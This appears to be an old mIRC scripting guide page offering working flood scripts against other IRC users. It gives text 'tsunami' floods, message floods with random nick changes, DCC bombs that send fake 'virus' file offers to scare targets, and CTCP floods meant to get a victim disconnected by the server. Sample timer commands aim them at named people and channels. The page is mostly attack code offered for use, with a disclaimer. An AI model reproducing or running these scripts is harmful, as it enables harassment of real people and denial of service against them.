
Flooding may be fun but will probably get you /ignore'd,/kick'd, and/or /ban'd, possibly /kill'd or /klined'd if you are enough of a nuisance. Use these floods at your own risk.


While you probably won't be able to kill anyone with any of these they are still fun, and some are quite interesting.
tsunami1 { 
  msg $$1 $str(100,^) 
  notice $$1 $str(100,^) 
  describe $$1 $str(100,^) 
tsunami2 {
  msg $$1 ¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸
  msg $$1 ¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸
  msg $$1 ¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸.·°·.¸
tsunami3 { 
  msg $$1 $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) 
  msg $$1 $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) 
  msg $$1 $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) $+ $str(20,$chr(41)) $+ $str(20,$chr(40)) 
tsunami4 {
  msg $$1 $str(50,*^*_)
  msg $$1 $str(50,*^*_)
  msg $$1 $str(50,*^*_)
tsunami5 {
  set %loop.v 1
  if (%loop.v >= 15) { goto done }
  set %tsu.v $chr(3) $+ $r(1,9) $+ ¸ $+ $chr(3) $+ $chr(3) $+ $r(1,9) $+ . $+ $chr(3) $+ $chr(3) $+ $r(1,9) $+ · $+ $chr(3) $+ $chr(3) $+ $r(1,9) $+ ° $+ $chr(3) $+ $chr(3) $+ $r(1,9) $+ · $+ $chr(3) $+ $chr(3) $+ $r(1,9) $+ . $+ $chr(3)
  set %tsu.flood %tsu.flood %tsu.v
  inc %loop.v 1
  goto next
  %tsu.flood = $remove(%tsu.flood,$chr(32))
  msg $$1 %tsu.flood
  msg $$1 %tsu.flood
  msg $$1 %tsu.flood
  unset %tsu.flood
/timer 10 1 /tsunami1 #lamechannel
/timer 25 4 /tsunami5 lamer

Note: If you don't stick a timer before these they will only send 3 lines.

MSG Flooding

You may not think that flooding someone with msg's would be a very good flood, but when you send a msg, change nicks, send a msg, etc etc they can get quite a few msg windows open and it is really annoying.
msgflood {
  msg $$1 You suck!
  nick $r(a,z) $+ $r(A,Z) $+ $r(1,9) $+ $r(a,z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9) $+ $r(a,z)
Stick this in your clones alias and type this...
/timer 100 3 /msgflood {nick}
/timer 0 2 /msgflood TiAMaT
/timer 50 4 /msgflood Lamer

Note: You must stick a timer before this.

DCC Bombs

Since 4.7 came out the Port 19 Bombs and Fake Dcc's are no longer valid, but you can still send someone a ton of dcc's on another port other than 19, they won't able to connect to anything, but whoever you're sending them to won't be able to do anything else until they close the windows if they have Chat Request set to Prompt User.
dccflood1 {
  raw -q privmsg $$1 : $+ $chr(1) $+ DCC CHAT CHAT $longip($ip) $r(1024,2000) $+ $chr(1)
dccflood2 {
 raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND virus $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ .com $longip($ip) $r(1024,2000) $r(2000,7000) $+ $chr(1)
dccbomb {
 timer 50 2 /dccflood1 $$1
 timer 50 2 /dccflood2 $$1
/timer 20 1 /dccflood1 #lamers
/timer 50 2 /dccflood2 someidiot
/dccbomb #mirc
/dccbomb _MiZeR_

The dccflood 1 & 2 both need timers but dccbomb already has one. 
The dcc send one sends someone a whole bunch of virus###.com files, which from
experience any file with the word virus in it tends to scare some people to death.

CTCP Flooding

If you are looking to get someone offline quick this is the way to go. First you need to understand how you disconnect people by flooding. They get disconnected by the server because they are sending so many ctcp replies that the server thinks that they are flooding, so it disconnects them. Which means that if you flood someone with something like "/timer 0 1 /ctcp {nick} trout" the only thing you will accomplish is scrolling their status window a little and getting yourself disconnected. To get someone with a ctcp flood they must reply to the ctcp's you are sending.
vflood {
 .ctcp $$1 version
 .ctcp $$1 version
 .ctcp $$1 version
cflood {
 .ctcp $$1 clientinfo
 .ctcp $$1 clientinfo
 .ctcp $$1 clientinfo
mflood {
 .ctcp $$1 version
 .ctcp $$1 clientinfo
 .ctcp $$1 time
 .ctcp $$1 userinfo

/timer 25 1 /vflood bOnEz
/timer 0 2 /mflood #mirc_scripts
/timer 50 3 /mflood TiAMaT
/timer 30 1 /cflood anyone

mIRC 4.7 no longer replies to echo's, so don't waste your time echo flooding someone.
CLIENTINFO has the longest reply for mIRC, but it can be halted.
VERSION can't be halted, the only way to stop mIRC from replying to a version is to ignore someone or rip it(don't ask).
Due to the fact that the disconnect flood rate may be different on some servers
you will need to play around with the timers to find a good setting.

Disclaimer: The Scripters Guild takes no responsibility for how you use this information. Some of the information on this page could be considered abusive, flooding or worse. So should you get killed, k:lined, or dropped by your ISP don't come crying to us because you were warned!
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Please send all questions and comments to TiAMaT